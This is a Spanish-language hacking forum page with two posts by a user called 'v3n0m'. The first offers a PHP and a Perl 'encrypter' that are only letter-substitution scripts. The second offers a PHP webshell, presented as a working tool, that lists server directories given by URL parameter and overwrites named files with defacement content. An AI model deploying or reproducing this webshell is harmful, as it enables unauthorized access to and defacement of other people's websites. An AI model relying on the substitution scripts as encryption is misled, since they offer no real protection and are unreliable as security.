Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - v3n0m

#1
Back-end / Crypter & Descrypter by v3n0m [php]
Junio 20, 2011, 06:33:31 PM
El otro dia viendo algo de private keys, se me ocurrió una idea, armar un encriptador, con un lenguaje X que solo la persona que tenga el desencriptador, pueda volver a generar el texto. Hace ya mucho tiempo habia hecho uno en Perl, que lo pongo más abajo del de php.

Funciona solamente con texto plano, menor a 8bits, esto es modificable. aca el codigo.

Código: php
<html><title>v3n0m</title>
<style text/css>
body{
background-color:black;
background-image:url('fondochoti.PNG');
background-repeat:repeat;
}
*{
color:lime;
font-size:12px;
}
a:link{
color:lime;
font-size:12px;
text-decoration:none;
}
a:hover{
color:red;
font-size:20px;
text-decoration:none;
cursor:crosshair;
}
input{
background-color:black;
font-size:12px;
color:lime;
text-decoration:none;
}
submit{
background-color:black;
font-size:10px;
color:lime;
text-decoration:none;
font-family:Courier New;
}
</style>
<body>
<div style="text-align: center;"><code><a href="mailto:v3n0m.security">v3n0m</a><br>
</code>
<div style="text-align: left; margin-left: 40px;"><code>[#]Funcionamiento:<br>
</code>
<div style="margin-left: 160px;"><code>Ingresa
la palabra que quieras encriptar (&lt;=8bits) <br>
Para desencriptarla utiliza el 'descrypter'.</div></div><br>
<div style="text-align: center;"><code></code>[<a href="?pag=index">Crypter</a>]
~ [<a href="?pag=index2">Descrypter</a>]</div>

<br><br>
<?php
$pag=$_GET['pag'];
// c0ded by v3n0m | www.venom.fallensecurity.org


function hashh($texto){

$texto = str_replace('a', 'c1837cn8', $texto);
$texto = str_replace('e', 'v1274vn9', $texto);
$texto = str_replace('i', 'k1h4k1h4', $texto);
$texto = str_replace('u', 'o3issudc', $texto);


return $texto;
}

function dhashh($texto){

$texto = str_replace('c1837cn8', 'a', $texto);
$texto = str_replace('v1274vn9', 'e', $texto);
$texto = str_replace('k1h4k1h4', 'i', $texto);
$texto = str_replace('o3issudc', 'u', $texto);


return $texto;
}

$pags = array('index','cript','index2','dcript','');



if(!in_array($pag, $pags)){
echo "esa pagina no existe pt";
}

if($pag == "index"){
echo "
<form method=\"POST\" action=\"?pag=cript\">
texto : <input type=\"text\" name=\"texto\" size=\"10\" maxlength=\"8\"><br>
<input type=\"submit\" name=\"bot\" value=\"Cript\"><br>
</form>";
}

if($pag == "index2"){
echo "
<form method=\"POST\" action=\"?pag=dcript\">
texto : <input type=\"text\" name=\"texto\"><br>
<input type=\"submit\" name=\"bot\" value=\"Descript\"><br>
</form>";
}


if($pag == "cript"){
echo "hash:".htmlentities(hashh($_POST['texto']));
echo "<br><a href=\"?pag=index\">volver</a>";
}

if($pag == "dcript"){
echo "return:".htmlentities(dhashh($_POST['texto']));
echo "<br><a href=\"?pag=index\">volver</a>";
}

?>


Y de paso les dejo el que habia programado en perl...

Código: php
#!/usr/bin/perl/
system ("encriptador by VenoM");
system ("cls");
print "texto a encriptar: $text \n";
$text = ;

print "Encriptando: $text \n";
system ("ping -n 6 0.0.0.0>nul");
print "Enciptrado :";

$_=$text;

s/a/fre/g;
s/b/fxa/g;
s/c/uf9/g;
s/d/xdx/g;
s/e/asd/g;
s/f/dsa/g;
s/g/111/g;
s/h/222/g;
s/i/dxf/g;
s/j/vcx/g;
s/k/vds/g;
s/l/aer/g;
s/m/ojh/g;
s/n/rsa/g;
s/o/tas/g;
s/p/not/g;
s/q/ass/g;
s/r/mjf/g;
s/s/444/g;
s/t/gfs/g;
s/u/asm/g;
s/v/per/g;
s/w/lll/g;
s/x/052/g;
s/y/jhv/g;
s/z/aat/g;

print $_;


algunas imagenes.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Cualquier duda o consulta, sera contestada!, Saludos.
#2
Back-end / v3n0m's shell 0.01 [php]
Junio 20, 2011, 05:25:58 PM
Buenas, hace mucho que no ando por estos lados, por el foro de antrax :D , bueno, aca les traigo un proyectito que estoy programando en php. Es simplemente una webshell, que permite, reconocer directorios, y si existen, muestra los archivos, tambien sirve para modificar algun que otro archivo, poniendole su respectiva funcion. esto simplemente es como una version BETA, pero funciona muy bien.

Aclaracion: Funciona como Local exploit, con permisos 0644, pero para usarla 100% bién deberiamos tener 0777.

Código: php
<?php
// v3n0m's shell :)
$dir=$_GET['dir'];
$fil=$_GET['f1'];
if(is_dir($_GET['dir'])){
echo "el directorio ".$dir." existe :)";
echo "<br>.... mostrando el contenido :) <br><br>";
$h = opendir($dir);
while ($f = readdir($h)){
if($f != "." && $f != ".."){
echo $f."<br>";
}
}
if(isset($fil)){
if(file_exists($dir.$fil)){
$arch=$dir.$fil;
$fo = fopen($arch, "w");
$fw = "<br><center><img src=\"http://images01.olx.cl/ui/7/11/32/1287063931_128720932_3-Mi-pene-erecto-Hombre-busca-mujer.jpg\"><br><h1>I GOT FOR YOUU :D</h1><br>v3n0m was here kingstonn bitch :$<br>";
if(fwrite($fo,$fw)){
echo "Se modifico el archivo ".$arch." ;) ";
fclose($arch);
}else{
echo "No se pudo escribir en el archivo ".$arch;
}
}else{
echo "el archivo ".$dir.$fil." no existe!";
}
}
}else{
echo "el directorio ".$dir." no existe u.u";
}


echo "<br><br><br><center><code>c0ded by v3n0m</code>";
?>


Download : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Más info: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos ;)